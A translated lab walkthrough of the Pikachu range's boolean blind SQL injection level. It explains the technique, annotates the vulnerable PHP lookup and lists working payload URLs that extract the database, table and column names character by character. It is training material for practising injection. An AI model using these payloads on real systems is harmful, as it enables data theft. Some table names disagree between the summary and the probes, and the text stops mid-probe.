Pikachu Range Walkthrough Notes 25: SQL Injection 08 - Boolean Blind Injection (base on boolian, penetration by manual injection and by script)

Contents

I. SQL Injection

II. Boolean Blind Injection

III. Source Code Analysis

IV. Penetration Practice

1. Probing for SQL Injection

(1) Enter an existing account

(2) Enter a non-existent account

(3) Enter a single quote or other input that may cause an error

2. Manual Injection

(1) Probing the database name

(2) Probing the table names

(3) Probing the column names

(4) Probing the data

3. Penetration with sqlmap


This series collects the penetration notes for the ten SQL injection levels of the Pikachu range walkthrough. Through a code audit of the boolean blind injection (base on boolian) level we find the real cause of the SQL injection risk, explain the principle of boolean blind injection and carry out the penetration in practice. This article covers the penetration part of SQL injection level 09, boolean blind injection (base on boolian).

I. SQL Injection

SQL injection arises when data from the front end is passed to the back end for use in an SQL statement without strict checking, so that the submitted "data", once concatenated into the SQL statement, is executed as part of it. The result is damage to the database: its contents dumped, deleted, or even the whole server compromised.

II. Boolean Blind Injection

Boolean blind injection is a SQL injection technique used when an application, after running a SQL query, returns only two kinds of result (the page displays normally or abnormally, or returns "true" or "false") and no detailed database error messages or query results. An attacker can exploit this by constructing a series of boolean conditions and inferring information from the application's responses, gradually extracting the sensitive contents of the database.

The core of boolean blind injection is using boolean expressions in the SQL statement as condition tests. By repeatedly constructing different boolean conditions and observing the application's response (page state, returned content and so on), the attacker determines whether each condition holds and step by step obtains database information: the database name, table names, column names and the data itself.

The steps of a boolean blind injection are as follows.

Step | Action
Identify the injection point | Submit special characters (such as a single quote ') and observe the application's response; if the page behaves abnormally (an error, an unexpected message), an injection point may exist
Determine the database name length | Construct a boolean condition and try different length values; the response (normal display means the condition holds, abnormal display means it does not) reveals the length of the database name
Retrieve the database name character by character | Use SUBSTRING to cut out one character and ASCII to convert it to its ASCII code, try different code values, and determine the character at that position from the response
Determine the table name length | Obtain the table name length from the information_schema tables by constructing a boolean condition and trying different length values until the length of the first table name is found
Retrieve the table name character by character | As with the database name, extract the table name character by character from information_schema
Retrieve column names and data | Repeat the character-by-character method above to obtain the column names from information_schema, and then the data itself

III. Source Code Analysis

Open the source file of the SQL injection - boolean blind level of the pikachu range, sqli_blind_b.php, shown below.

This PHP code implements a simple user-information lookup. When the user submits the form by GET with a submit parameter and a name parameter, the code concatenates the value of name straight into the SQL query and looks up the id and email of the record in the member table whose username equals that value. If exactly one record is found, its id and email are displayed as an HTML paragraph; if none is found, the user is told that the username does not exist. The annotated code follows.

<?php
// Call connect() to open the database connection and store the link object in $link
$link = connect();

// Initialise the variable that accumulates the HTML shown as the query result or the prompt
$html = '';

// Check that the form was submitted by GET and that the 'name' field is not empty
if (isset($_GET['submit']) && $_GET['name'] != null) {
    // Take the 'name' parameter submitted by GET as-is, without any processing
    $name = $_GET['name'];

    // Build the SQL query that selects id and email from the member table where username equals the user input
    // 'name' is a string, so it is wrapped in single quotes in the SQL statement; this is where the SQL injection risk lies
    $query = "select id,email from member where username='$name'";

    // Run the assembled SQL query with mysqli_query
    // mysqli_query does not print a detailed error description when the query fails, which makes an injection harder to spot even when it exists
    $result = mysqli_query($link, $query);

    // Check that the result set is valid and that it contains exactly one row
    if ($result && mysqli_num_rows($result) == 1) {
        // With exactly one record in the result set, fetch it row by row with a while loop
        while ($data = mysqli_fetch_assoc($result)) {
            // Read the 'id' field from the associative array $data into $id
            $id = $data['id'];
            // Read the 'email' field from the associative array $data into $email
            $email = $data['email'];
            // Append the user information to $html as an HTML string
            $html .= "<p class='notice'>your uid:{$id} <br />your email is: {$email}</p>";
        }
    } else {
        // If the result set is empty or the query failed, append the prompt message to $html
        $html .= "<p class='notice'>您输入的 username 不存在,请重新输入!</p>";
    }
}
?>

The code carries a boolean-based SQL injection risk, and the key is that the name parameter submitted by GET is not processed at all: $_GET['name'] is concatenated directly into the SQL query string with no validation, escaping or parameter binding. An attacker can exploit this to craft input that changes the logic of the SQL statement and then read the answer from the two different messages the page returns (record found versus record not found). Note that the page shows the same "username does not exist" message both when the query returns no rows and when mysqli_query fails outright, which is exactly what the probes in the next section rely on: their CASE expression returns 1 when the tested condition holds, leaving the WHERE clause matching the known user lili, and otherwise returns a multi-row subquery that MySQL rejects, so a false condition ends up as the "does not exist" message.

IV. Penetration Practice

1. Probing for SQL Injection

(1) Enter an existing account

As shown below, entering an existing account outputs the account's id and email address.

(2) Enter a non-existent account

Entering a non-existent account, for example "mooyuan---", produces the prompt "您输入的username不存在,请重新输入" (the username you entered does not exist, please try again), as shown below.

(3) Enter a single quote or other input that may cause an error

Entering a single quote, which in level 02 and others produced a SQL error message, produces no error message in this level, only the same "您输入的username不存在,请重新输入" prompt, as shown below.

For comparison, the same single-quote input in level 2 (character type) produces an error, as shown below.

2. Manual Injection

(1) Probing the database name

As shown below, the database name is 7 characters long and the name is pikachu.

[+] 第一步:探测数据库名
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (LENGTH(DATABASE()) = 7) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
数据库名长度:7
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING(DATABASE(), 1, 1) = 'p') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING(DATABASE(), 2, 1) = 'i') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING(DATABASE(), 3, 1) = 'k') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING(DATABASE(), 4, 1) = 'a') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING(DATABASE(), 5, 1) = 'c') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING(DATABASE(), 6, 1) = 'h') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING(DATABASE(), 7, 1) = 'u') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
数据库名:pikachu

(2) Probing the table names

As shown below, the pikachu database has 5 tables: emails, httpinfo, member, users and xss_blind.

[+] 第二步:探测表信息
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN ((SELECT COUNT(TABLE_NAME) FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu') > 4) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN ((SELECT COUNT(TABLE_NAME) FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu') = 5) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
表数量:5
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (LENGTH((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 0,1)) = 8) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
[+] 表名长度: 8
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 0,1), 1, 1) = 'h') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 0,1), 2, 1) = 't') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 0,1), 3, 1) = 't') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 0,1), 4, 1) = 'p') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 0,1), 5, 1) = 'i') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 0,1), 6, 1) = 'n') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 0,1), 7, 1) = 'f') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 0,1), 8, 1) = 'o') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询

表 1: httpinfo
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (LENGTH((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 1,1)) > 4) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (LENGTH((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 1,1)) = 6) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
[+] 表名长度: 6
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 1,1), 1, 1) = 'm') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 1,1), 2, 1) = 'e') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 1,1), 3, 1) = 'm') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 1,1), 4, 1) = 'b') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 1,1), 5, 1) = 'e') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 1,1), 6, 1) = 'r') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询

表 2: member
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (LENGTH((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 2,1)) > 4) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (LENGTH((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 2,1)) > 6) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (LENGTH((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 2,1)) = 7) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
[+] 表名长度: 7
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 2,1), 1, 1) = 'm') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 2,1), 2, 1) = 'e') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 2,1), 3, 1) = 's') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 2,1), 4, 1) = 's') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 2,1), 5, 1) = 'a') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 2,1), 6, 1) = 'g') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 2,1), 7, 1) = 'e') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询

表 3: message
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (LENGTH((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 3,1)) > 4) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (LENGTH((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 3,1)) = 5) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
[+] 表名长度: 5
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 3,1), 1, 1) = 'u') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 3,1), 2, 1) = 's') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 3,1), 3, 1) = 'e') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 3,1), 4, 1) = 'r') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 3,1), 5, 1) = 's') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询

表 4: users
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (LENGTH((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 4,1)) = 8) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
[+] 表名长度: 8
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 4,1), 1, 1) = 'x') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 4,1), 2, 1) = 's') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 4,1), 3, 1) = 's') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 4,1), 4, 1) = 'b') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 4,1), 5, 1) = 'l') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 4,1), 6, 1) = 'i') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 4,1), 7, 1) = 'n') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 4,1), 8, 1) = 'd') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询

表 5: xssblind

(3) Probing the column names

As shown below, the users table has four columns: id, username, password and level.

[+] 第三步:探测表 users 的列
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN ((SELECT COUNT(COLUMN_NAME) FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='pikachu' AND TABLE_NAME='users') = 4) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
列数量:4
[*] 正在探测表 users 的第 1 列名...
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (LENGTH((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='pikachu' AND TABLE_NAME='users' LIMIT 0,1)) = 2) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
[+] 列名长度: 2
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='pikachu' AND TABLE_NAME='users' LIMIT 0,1), 1, 1) = 'i') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='pikachu' AND TABLE_NAME='users' LIMIT 0,1), 2, 1) = 'd') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询

[+] 列名: id
列 1: id
[*] 正在探测表 users 的第 2 列名...
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (LENGTH((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='pikachu' AND TABLE_NAME='users' LIMIT 1,1)) = 8) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
[+] 列名长度: 8
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='pikachu' AND TABLE_NAME='users' LIMIT 1,1), 1, 1) = 'u') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='pikachu' AND TABLE_NAME='users' LIMIT 1,1), 2, 1) = 's') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='pikachu' AND TABLE_NAME='users' LIMIT 1,1), 3, 1) = 'e') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='pikachu' AND TABLE_NAME='users' LIMIT 1,1), 4, 1) = 'r') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='pikachu' AND TABLE_NAME='users' LIMIT 1,1), 5, 1) = 'n') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='pikachu' AND TABLE_NAME='users' LIMIT 1,1), 6, 1) = 'a') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='pikachu' AND TABLE_NAME='users' LIMIT 1,1), 7, 1) = 'm') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='pikachu' AND TABLE_NAME='users' LIMIT 1,1), 8, 1) = 'e') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询

[+] 列名: username
列 2: username
[*] 正在探测表 users 的第 3 列名...
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (LENGTH((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='pikachu' AND TABLE_NAME='users' LIMIT 2,1)) = 8) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
[+] 列名长度: 8
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='pikachu' AND TABLE_NAME='users' LIMIT 2,1), 1, 1) = 'p') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='pikachu' AND TABLE_NAME='users' LIMIT 2,1), 2, 1) = 'a') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='pikachu' AND TABLE_NAME='users' LIMIT 2,1), 3, 1) = 's') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='pikachu' AND TABLE_NAME='users' LIMIT 2,1), 4, 1) = 's') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='pikachu' AND TABLE_NAME='users' LIMIT 2,1), 5, 1) = 'w') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
